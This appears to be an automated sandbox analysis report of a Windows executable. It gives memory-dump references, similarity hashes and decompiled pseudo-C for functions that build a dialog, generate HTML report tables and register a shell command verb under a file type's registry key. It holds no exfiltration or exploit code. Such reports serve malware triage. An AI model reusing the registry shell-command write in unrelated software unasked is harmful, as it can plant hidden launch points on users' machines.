                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                                                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                  • API String ID: 3143752011-1996832678
                                                                                                                                                                  • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                                                                  • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                                                                                                  • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                                                                                  • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00403C03, Relevance: 30.2, APIs: 20, Instructions: 235windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                                                  			E00403C03(void* __eflags) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* _t88;
				void* _t108;
				void* _t113;
				void* _t119;
				void* _t121;
				void* _t122;
				void* _t123;
				intOrPtr* _t124;
				void* _t134;

				_t113 = _t108;
				E00403B3C(_t113);
				E00403B16(_t113);
				DragAcceptFiles( *(_t113 + 0x10), 1);
				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
				E0040AD85(GetDlgItem( *(_t113 + 0x10), 0x402));
				 *_t124 = 0x3ea;
				E0040AD85(GetDlgItem(??, ??));
				 *_t124 = 0x3f1;
				_t116 = GetDlgItem( *(_t113 + 0x10),  *(_t113 + 0x10));
				E004049D9(_t49, E00405B81(0x259), 0x20);
				E004049D9(_t49, E00405B81(0x25a), 0x40);
				E004049D9(_t116, E00405B81(0x25b), 0x80);
				E004049D9(_t116, E00405B81(0x25c), 0x100);
				E004049D9(_t116, E00405B81(0x25d), 0x4000);
				E004049D9(_t116, E00405B81(0x25e), 0x8000);
				_t117 = GetDlgItem( *(_t113 + 0x10), 0x3f5);
				E004049D9(_t62, E00405B81(0x26c), 0);
				E004049D9(_t62, E00405B81(0x26d), 1);
				E004049D9(_t117, E00405B81(0x26e), 2);
				E004049D9(_t117, E00405B81(0x26f), 3);
				_t134 = _t124 + 0x78;
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x400);
				_t119 = 1;
				do {
					_t17 = _t119 + 0x280; // 0x281
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t17), _t119);
					_t134 = _t134 + 0xc;
					_t119 = _t119 + 1;
				} while (_t119 <= 9);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x3fc);
				_t121 = 1;
				do {
					_t21 = _t121 + 0x294; // 0x295
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t21), _t121);
					_t134 = _t134 + 0xc;
					_t121 = _t121 + 1;
				} while (_t121 <= 3);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x407);
				_t122 = 0;
				do {
					_t25 = _t122 + 0x2bc; // 0x2bc
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t25), _t122);
					_t134 = _t134 + 0xc;
					_t122 = _t122 + 1;
				} while (_t122 <= 0xd);
				 *((intOrPtr*)(_t134 + 0x10)) = GetDlgItem( *(_t113 + 0x10), 0x40c);
				_t123 = 0;
				do {
					_t29 = _t123 + 0x2ee; // 0x2ee
					E004049D9( *((intOrPtr*)(_t134 + 0x18)), E00405B81(_t29), _t123);
					_t134 = _t134 + 0xc;
					_t123 = _t123 + 1;
					_t143 = _t123 - 3;
				} while (_t123 < 3);
				SendDlgItemMessageW( *(_t113 + 0x10), 0x3fd, 0xc5, 0, 0);
				E00403EC3(GetDlgItem, _t113);
				SetFocus(GetDlgItem( *(_t113 + 0x10), 0x402));
				_t88 = E00402D78(_t113, _t143);
				E00402BEE(_t113);
				return _t88;
			}
















                                                                                                                                                                  0x00403c09
                                                                                                                                                                  0x00403c0c
                                                                                                                                                                  0x00403c11
                                                                                                                                                                  0x00403c1b
                                                                                                                                                                  0x00403c3f
                                                                                                                                                                  0x00403c4a
                                                                                                                                                                  0x00403c6e
                                                                                                                                                                  0x00403c96
                                                                                                                                                                  0x00403c9a
                                                                                                                                                                  0x00403ca6
                                                                                                                                                                  0x00403cb3
                                                                                                                                                                  0x00403cb8
                                                                                                                                                                  0x00403cc5
                                                                                                                                                                  0x00403cca
                                                                                                                                                                  0x00403cdd
                                                                                                                                                                  0x00403ce6
                                                                                                                                                                  0x00403cf8
                                                                                                                                                                  0x00403d11
                                                                                                                                                                  0x00403d26
                                                                                                                                                                  0x00403d3f
                                                                                                                                                                  0x00403d54
                                                                                                                                                                  0x00403d6d
                                                                                                                                                                  0x00403d76
                                                                                                                                                                  0x00403d88
                                                                                                                                                                  0x00403d9e
                                                                                                                                                                  0x00403db0
                                                                                                                                                                  0x00403db5
                                                                                                                                                                  0x00403dc4
                                                                                                                                                                  0x00403dc8
                                                                                                                                                                  0x00403dc9
                                                                                                                                                                  0x00403dca
                                                                                                                                                                  0x00403dda
                                                                                                                                                                  0x00403ddf
                                                                                                                                                                  0x00403de2
                                                                                                                                                                  0x00403de3
                                                                                                                                                                  0x00403df4
                                                                                                                                                                  0x00403df8
                                                                                                                                                                  0x00403df9
                                                                                                                                                                  0x00403dfa
                                                                                                                                                                  0x00403e0a
                                                                                                                                                                  0x00403e0f
                                                                                                                                                                  0x00403e12
                                                                                                                                                                  0x00403e13
                                                                                                                                                                  0x00403e22
                                                                                                                                                                  0x00403e26
                                                                                                                                                                  0x00403e28
                                                                                                                                                                  0x00403e29
                                                                                                                                                                  0x00403e39
                                                                                                                                                                  0x00403e3e
                                                                                                                                                                  0x00403e41
                                                                                                                                                                  0x00403e42
                                                                                                                                                                  0x00403e51
                                                                                                                                                                  0x00403e55
                                                                                                                                                                  0x00403e57
                                                                                                                                                                  0x00403e58
                                                                                                                                                                  0x00403e68
                                                                                                                                                                  0x00403e6d
                                                                                                                                                                  0x00403e70
                                                                                                                                                                  0x00403e71
                                                                                                                                                                  0x00403e71
                                                                                                                                                                  0x00403e87
                                                                                                                                                                  0x00403e8d
                                                                                                                                                                  0x00403e9e
                                                                                                                                                                  0x00403ea6
                                                                                                                                                                  0x00403eaf
                                                                                                                                                                  0x00403ebc

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B5D
                                                                                                                                                                    • Part of subcall function 00403B3C: memset.MSVCRT ref: 00403B76
                                                                                                                                                                    • Part of subcall function 00403B3C: _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                                                                    • Part of subcall function 00403B16: SetDlgItemTextW.USER32 ref: 00403B34
                                                                                                                                                                  • DragAcceptFiles.SHELL32(?,00000001), ref: 00403C1B
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00403C2F
                                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000FC,Function_00003A73), ref: 00403C39
                                                                                                                                                                    • Part of subcall function 00402DDD: GetClientRect.USER32 ref: 00402DEF
                                                                                                                                                                    • Part of subcall function 00402DDD: GetWindow.USER32 ref: 00402E07
                                                                                                                                                                    • Part of subcall function 00402DDD: GetWindow.USER32 ref: 00402E0A
                                                                                                                                                                    • Part of subcall function 00402DDD: GetWindow.USER32 ref: 00402E16
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403C57
                                                                                                                                                                  • LoadImageW.USER32 ref: 00403C6A
                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403C72
                                                                                                                                                                  • LoadImageW.USER32 ref: 00403C7F
                                                                                                                                                                  • SendMessageW.USER32(?,00000080,00000000,?), ref: 00403C9A
                                                                                                                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 00403CA6
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00403CB0
                                                                                                                                                                    • Part of subcall function 0040AD85: GetProcAddress.KERNEL32(00000000,shlwapi.dll,74EB48C0,?,00403CB8,00000000), ref: 0040AD9D
                                                                                                                                                                    • Part of subcall function 0040AD85: FreeLibrary.KERNEL32(00000000,?,00403CB8,00000000), ref: 0040ADB5
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00403CC2
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00403CD4
                                                                                                                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                                                                    • Part of subcall function 00405B81: LoadStringW.USER32 ref: 00405C59
                                                                                                                                                                    • Part of subcall function 00405B81: memcpy.MSVCRT(00000000,00000002,?,?,00403490), ref: 00405C99
                                                                                                                                                                    • Part of subcall function 004049D9: SendMessageW.USER32(?,00000143,00000000,?), ref: 004049F0
                                                                                                                                                                    • Part of subcall function 004049D9: SendMessageW.USER32(?,00000151,00000000,?), ref: 00404A02
                                                                                                                                                                    • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                                                                    • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                                                                    • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00403D64
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00403DC0
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00403DF0
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00403E20
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00403E4F
                                                                                                                                                                  • SendDlgItemMessageW.USER32 ref: 00403E87
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00403E9B
                                                                                                                                                                  • SetFocus.USER32(00000000), ref: 00403E9E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Item$MessageSend$HandleModuleWindow$Load$Imagememset$AcceptAddressClientDragFilesFocusFreeLibraryLongProcRectStringText_snwprintfmemcpywcscpywcslen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1038210931-0
                                                                                                                                                                  • Opcode ID: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                                                                  • Instruction ID: 1ad7597cb923a57af30b7376ae6fce15a7391ca9e5b6ac25faa2013acf12c195
                                                                                                                                                                  • Opcode Fuzzy Hash: 480d4766e6d8641b1262395da53219e72a248241b0e6c98f945c6f60a0780f3c
                                                                                                                                                                  • Instruction Fuzzy Hash: D261A6B09407087FE6207F71DC47F2B7A6CEF40714F000A3ABB46751D3DABA69158A59
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407763, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 56%
                                                                                                                                                                  			E00407763(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void _v138;
				long _v140;
				void _v242;
				char _v244;
				void _v346;
				char _v348;
				void _v452;
				void _v962;
				signed short _v964;
				void* __esi;
				void* _t87;
				wchar_t* _t109;
				intOrPtr* _t124;
				signed int _t125;
				signed int _t140;
				signed int _t153;
				intOrPtr* _t154;
				signed int _t156;
				signed int _t157;
				void* _t159;
				void* _t161;

				_t124 = __ebx;
				_v964 = _v964 & 0x00000000;
				memset( &_v962, 0, 0x1fc);
				_t125 = 0x18;
				memcpy( &_v452, L"<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t125 << 2);
				asm("movsw");
				_t153 = 0;
				_v244 = 0;
				memset( &_v242, 0, 0x62);
				_v348 = 0;
				memset( &_v346, 0, 0x62);
				_v140 = 0;
				memset( &_v138, 0, 0x62);
				_t161 = _t159 + 0x3c;
				_t87 =  *((intOrPtr*)( *__ebx + 0x14))();
				_v16 =  *((intOrPtr*)(__ebx + 0x2d4));
				if(_t87 != 0xffffffff) {
					_push(E0040ADC0(_t87,  &_v964));
					_push(L" bgcolor=\"%s\"");
					_push(0x32);
					_push( &_v244);
					L0040B1EC();
					_t161 = _t161 + 0x18;
				}
				E00407343(_t124, _a4, L"<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t153;
				if( *((intOrPtr*)(_t124 + 0x2c)) > _t153) {
					while(1) {
						_t156 =  *( *((intOrPtr*)(_t124 + 0x30)) + _v8 * 4);
						_v12 = _t156;
						_t157 = _t156 * 0x14;
						if( *((intOrPtr*)(_t157 +  *((intOrPtr*)(_t124 + 0x40)) + 8)) != _t153) {
							wcscpy( &_v140, L" nowrap");
						}
						_v32 = _v32 | 0xffffffff;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _t153;
						_t154 = _a8;
						 *((intOrPtr*)( *_t124 + 0x34))(6, _v8, _t154,  &_v32);
						E0040ADC0(_v32,  &_v348);
						E0040ADF1( *((intOrPtr*)( *_t154))(_v12,  *((intOrPtr*)(_t124 + 0x60))),  *(_t124 + 0x64));
						 *((intOrPtr*)( *_t124 + 0x50))( *(_t124 + 0x64), _t154, _v12);
						if( *((intOrPtr*)( *_t124 + 0x18))() == 0xffffffff) {
							wcscpy( *(_t124 + 0x68),  *(_t157 + _v16 + 0x10));
						} else {
							_push( *(_t157 + _v16 + 0x10));
							_push(E0040ADC0(_t106,  &_v964));
							_push(L"<font color=\"%s\">%s</font>");
							_push(0x2000);
							_push( *(_t124 + 0x68));
							L0040B1EC();
							_t161 = _t161 + 0x14;
						}
						_t109 =  *(_t124 + 0x64);
						_t140 =  *_t109 & 0x0000ffff;
						if(_t140 == 0 || _t140 == 0x20) {
							wcscat(_t109, L"&nbsp;");
						}
						E0040AE90( &_v32,  *((intOrPtr*)(_t124 + 0x6c)),  *(_t124 + 0x64));
						_push( *((intOrPtr*)(_t124 + 0x6c)));
						_push( &_v140);
						_push( &_v348);
						_push( *(_t124 + 0x68));
						_push( &_v244);
						_push( &_v452);
						_push(0x2000);
						_push( *((intOrPtr*)(_t124 + 0x60)));
						L0040B1EC();
						_t161 = _t161 + 0x28;
						E00407343(_t124, _a4,  *((intOrPtr*)(_t124 + 0x60)));
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t124 + 0x2c))) {
							goto L14;
						}
						_t153 = 0;
					}
				}
				L14:
				E00407343(_t124, _a4, L"</table><p>");
				return E00407343(_t124, _a4, L"\r\n");
			}































                                                                                                                                                                  0x00407763
                                                                                                                                                                  0x0040776c
                                                                                                                                                                  0x00407784
                                                                                                                                                                  0x0040778b
                                                                                                                                                                  0x00407797
                                                                                                                                                                  0x00407799
                                                                                                                                                                  0x0040779b
                                                                                                                                                                  0x004077a7
                                                                                                                                                                  0x004077ae
                                                                                                                                                                  0x004077bd
                                                                                                                                                                  0x004077c4
                                                                                                                                                                  0x004077d3
                                                                                                                                                                  0x004077da
                                                                                                                                                                  0x004077e1
                                                                                                                                                                  0x004077e6
                                                                                                                                                                  0x004077f2
                                                                                                                                                                  0x004077f5
                                                                                                                                                                  0x00407804
                                                                                                                                                                  0x00407805
                                                                                                                                                                  0x00407810
                                                                                                                                                                  0x00407812
                                                                                                                                                                  0x00407813
                                                                                                                                                                  0x00407818
                                                                                                                                                                  0x00407818
                                                                                                                                                                  0x00407825
                                                                                                                                                                  0x0040782d
                                                                                                                                                                  0x00407830
                                                                                                                                                                  0x0040783a
                                                                                                                                                                  0x00407840
                                                                                                                                                                  0x00407846
                                                                                                                                                                  0x00407849
                                                                                                                                                                  0x00407850
                                                                                                                                                                  0x0040785e
                                                                                                                                                                  0x00407864
                                                                                                                                                                  0x00407867
                                                                                                                                                                  0x0040786b
                                                                                                                                                                  0x0040786f
                                                                                                                                                                  0x00407877
                                                                                                                                                                  0x0040787a
                                                                                                                                                                  0x00407885
                                                                                                                                                                  0x00407892
                                                                                                                                                                  0x004078a8
                                                                                                                                                                  0x004078b8
                                                                                                                                                                  0x004078c5
                                                                                                                                                                  0x004078ff
                                                                                                                                                                  0x004078c7
                                                                                                                                                                  0x004078ca
                                                                                                                                                                  0x004078dd
                                                                                                                                                                  0x004078de
                                                                                                                                                                  0x004078e3
                                                                                                                                                                  0x004078e8
                                                                                                                                                                  0x004078eb
                                                                                                                                                                  0x004078f0
                                                                                                                                                                  0x004078f0
                                                                                                                                                                  0x00407906
                                                                                                                                                                  0x00407909
                                                                                                                                                                  0x0040790f
                                                                                                                                                                  0x0040791d
                                                                                                                                                                  0x00407923
                                                                                                                                                                  0x0040792d
                                                                                                                                                                  0x00407932
                                                                                                                                                                  0x0040793b
                                                                                                                                                                  0x00407942
                                                                                                                                                                  0x00407943
                                                                                                                                                                  0x0040794c
                                                                                                                                                                  0x00407953
                                                                                                                                                                  0x00407954
                                                                                                                                                                  0x00407959
                                                                                                                                                                  0x0040795c
                                                                                                                                                                  0x00407961
                                                                                                                                                                  0x0040796c
                                                                                                                                                                  0x00407971
                                                                                                                                                                  0x0040797a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407838
                                                                                                                                                                  0x00407838
                                                                                                                                                                  0x0040783a
                                                                                                                                                                  0x00407980
                                                                                                                                                                  0x0040798a
                                                                                                                                                                  0x004079a1

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                  • API String ID: 1607361635-601624466
                                                                                                                                                                  • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                                                                  • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                                                                                                  • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                                                                  • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 40%
                                                                                                                                                                  			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}





















                                                                                                                                                                  0x00407b65
                                                                                                                                                                  0x00407b7c
                                                                                                                                                                  0x00407b83
                                                                                                                                                                  0x00407b91
                                                                                                                                                                  0x00407b98
                                                                                                                                                                  0x00407ba6
                                                                                                                                                                  0x00407bad
                                                                                                                                                                  0x00407bb2
                                                                                                                                                                  0x00407bb9
                                                                                                                                                                  0x00407bca
                                                                                                                                                                  0x00407bcb
                                                                                                                                                                  0x00407bd6
                                                                                                                                                                  0x00407bdb
                                                                                                                                                                  0x00407bdc
                                                                                                                                                                  0x00407be1
                                                                                                                                                                  0x00407be1
                                                                                                                                                                  0x00407be8
                                                                                                                                                                  0x00407bf9
                                                                                                                                                                  0x00407bfa
                                                                                                                                                                  0x00407c05
                                                                                                                                                                  0x00407c0a
                                                                                                                                                                  0x00407c0b
                                                                                                                                                                  0x00407c1c
                                                                                                                                                                  0x00407c21
                                                                                                                                                                  0x00407c21
                                                                                                                                                                  0x00407c2a
                                                                                                                                                                  0x00407c2b
                                                                                                                                                                  0x00407c36
                                                                                                                                                                  0x00407c3b
                                                                                                                                                                  0x00407c3c
                                                                                                                                                                  0x00407c41
                                                                                                                                                                  0x00407c51
                                                                                                                                                                  0x00407c56
                                                                                                                                                                  0x00407c5b
                                                                                                                                                                  0x00407c65
                                                                                                                                                                  0x00407c68
                                                                                                                                                                  0x00407c6b
                                                                                                                                                                  0x00407c74
                                                                                                                                                                  0x00407c7b
                                                                                                                                                                  0x00407c80
                                                                                                                                                                  0x00407c82
                                                                                                                                                                  0x00407c88
                                                                                                                                                                  0x00407ca6
                                                                                                                                                                  0x00407c8a
                                                                                                                                                                  0x00407c8a
                                                                                                                                                                  0x00407c8b
                                                                                                                                                                  0x00407c96
                                                                                                                                                                  0x00407c9b
                                                                                                                                                                  0x00407c9c
                                                                                                                                                                  0x00407ca1
                                                                                                                                                                  0x00407ca1
                                                                                                                                                                  0x00407cb3
                                                                                                                                                                  0x00407cb4
                                                                                                                                                                  0x00407cbd
                                                                                                                                                                  0x00407cc4
                                                                                                                                                                  0x00407cc5
                                                                                                                                                                  0x00407cd0
                                                                                                                                                                  0x00407cd5
                                                                                                                                                                  0x00407cd6
                                                                                                                                                                  0x00407cdb
                                                                                                                                                                  0x00407ceb
                                                                                                                                                                  0x00407cf0
                                                                                                                                                                  0x00407cf3
                                                                                                                                                                  0x00407cf3
                                                                                                                                                                  0x00407cf3
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00407cfc
                                                                                                                                                                  0x00407d00

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000008.00000002.271967543.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000008.00000002.271953397.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.271994455.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272004329.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000008.00000002.272022348.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                  • API String ID: 2000436516-3842416460
                                                                                                                                                                  • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                                                                  • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                                                                                                                  • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                                                                  • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 51%
                                                                                                                                                                  			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
